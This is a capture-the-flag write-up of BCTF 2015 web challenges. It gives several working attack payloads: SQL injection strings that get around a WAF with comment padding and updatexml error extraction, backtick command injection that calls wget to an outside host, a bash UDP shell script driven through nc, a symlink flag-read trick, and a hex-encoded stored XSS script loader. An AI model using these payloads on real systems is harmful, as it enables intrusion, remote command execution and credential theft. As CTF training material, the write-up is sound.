Checkin 10
Desc: Please checkin at IRC
- IRC: http://webchat.freenode.net/
- Channels: bctf
Bulletin board:
[BCTF 2015 has started. Check in flag: OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx}.
Rot13 decode:
OPGS{jr1p0zr-g0-OPGS-2015_t00q-yhpx} <--> BCTF{we1c0me-t0-BCTF-2015_g00d-luck}
Sqli_engineScore 200
Desc:
http://104.197.7.111:8080/
geohot told me he has a lot of sql injection tricks. So I wrote a sql injection detection engine in defense.
Now you have a simple website protected by my engine, try to steal the admin’s password(not hash).
Username, Password ::: SQLi
<form id="submit-form" class="form-group" action="/register" method="POST"> <input type="text" placeholder="username" class="form-control" name="username"/> <input type="password" placeholder="password" class="form-control" name="password"/> <span class="input-icon fui-check-inverted"></span> <br /> <div class="row"> <div class="col-xs-3"> <button type="submit" class="btn btn-block btn-lg btn-primary">Register</button> </div> Already registered?<a href="/static/login.html">Click Here to Login</a> </div> <br /> </form>
SQL Injection:
URL: http://104.197.7.111:8080/register POST: username=admin&password=,' error executing sql: insert into users (username, password) values ('admin', ','') (1064, "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '','')' at line 1")
Continue:
username=admin\&password=,updatexml(1,(select password from users limit 1),1) or ' password contains SQL injection, IP recorded.
Bypass WAF:
username=admin\&password=,updatexml(1,(/*/*/select password from/*/*/users limit/*/*/1),1) or/*/*/' (1105, "XPATH syntax error: '{h0w-d1d-y0u-fee1-l1ke-th3-sql1-'")
Substring right:
username=admin\&password=,updatexml(1,(/*/*/select right(password,33)/*/*/from/*/*/users limit/*/*/1),1) or/*/*/' (1105, "XPATH syntax error: 'd-y0u-fee1-l1ke-th3-sql1-eng1ne}'")
String concatenation (FLAG):
{h0w-d1d-y0u-fee1-l1ke-th3-sql1-eng1ne}
Torrent_loverScore 233
Desc: A dog loves torrent.
http://218.2.197.253/zhongzi/index.php:
We guess, Maybe the command execution, The program calls the system function? Because we have no other way.
Testing:
http://www.google.com/`wget worm.cc:8000`/1.torrent http://www.google.com/`wget${IFS}worm.cc:8000`/1.torrent
We have received req (404):
root@e:/rootkit# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 118.186.202.142 - - [22/Mar/2015 13:44:39] "GET / HTTP/1.1" 200 - 118.186.202.142 - - [22/Mar/2015 13:44:41] code 404, message File not found
ubd.sh:
#!/bin/bash exec 9<> /dev/udp/localhost/8088 [ $? -eq 1 ] && exit echo "connect ok" >&9 while : do a=`dd bs=200 count=1 <&9 2>/dev/null` if echo "$a"|grep "exit"; then break; fi echo `$a` >&9 done exec 9>&- exec 9<&-
nc -lu 8088
find use_me_to_read_flag and flag:
/var/www/flag/use_me_to_read_flag /var/www/flag/flag >_ Permission denied
IDA, see _strstr “flag”:
Cat FLAG:
ln -s /var/www/flag/flag /tmp/warning /var/www/flag/use_me_to_read_flag /tmp/warning
Webchat 325
Desc: http://146.148.60.107:9991/
Websocket XSS? SQL Injection?
View-source:
<script> $(document).ready( function() { function connect() { $("#status").text("Connecting"); $("#status").attr("class", "text-primary"); var ws = new window.WebSocket('ws://' + location.host + '/ws'); ws.onopen = function() { $("#status").attr('class', 'text-success').text('Connected'); $("#submit_btn").attr('disabled', false).click(function() { $("#sendstatus").attr('class', 'text-primary').text('Sending...'); ws.send($("#i_nick").val() + ": " + $("#i_msg").val()); }); } ws.onclose = function() { $("#status").attr('class', 'text-danger').text('Disconnected'); setTimeout(connect, 5000);} ws.onerror = function() { $("#status").attr('class', 'text-danger').text('Failed to connect.'); } ws.onmessage = function(datad) { var data = datad.data; if (data[0] == 'm') $("#msg").html(data.substr(1) + "<br/>" + $("#msg").html()); if (data[0] == 's') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-success').text('Message Sent');} if (data[0] == 'e') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-danger').text('Message Rejected');} } } connect(); }); </script>
- http://ironwasp.org/cswsh.html
- ws://146.148.60.107:9991/ws
mysql> select hex('<script src=http://xss.net/0TLs5n?1426923466></script>'); +--------------------------------------------------------------+ | hex('<script src=http://xss.net/0TLs5n?1426923466></script>') | +--------------------------------------------------------------+ | 3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F | +--------------------------------------------------------------+ test: '),(0x3C73637269707***********3D687474703A2F2F7873732E6861636B7461736B2E6E65742F30544C73356E3F),('
http://146.148.60.107:9991/review?pass=QkNURnt4c3NfaXNfbm90X3RoYXRfZGlmZmljdWx0X3JpZ2h0fQ==&id=24
Page Content: Only admin in local network with correct password can review chat logs. But you’ve already had the flag you want,right?
➜ ~ echo -n "QkNURnt4c3NfaXNfbm90X3RoYXRfZGlmZmljdWx0X3JpZ2h0fQ==" | base64 -D BCTF{xss_is_not_that_difficult_right}
【原文:BCTF 2015 WEB Writeup 安全脉搏编辑整理发布】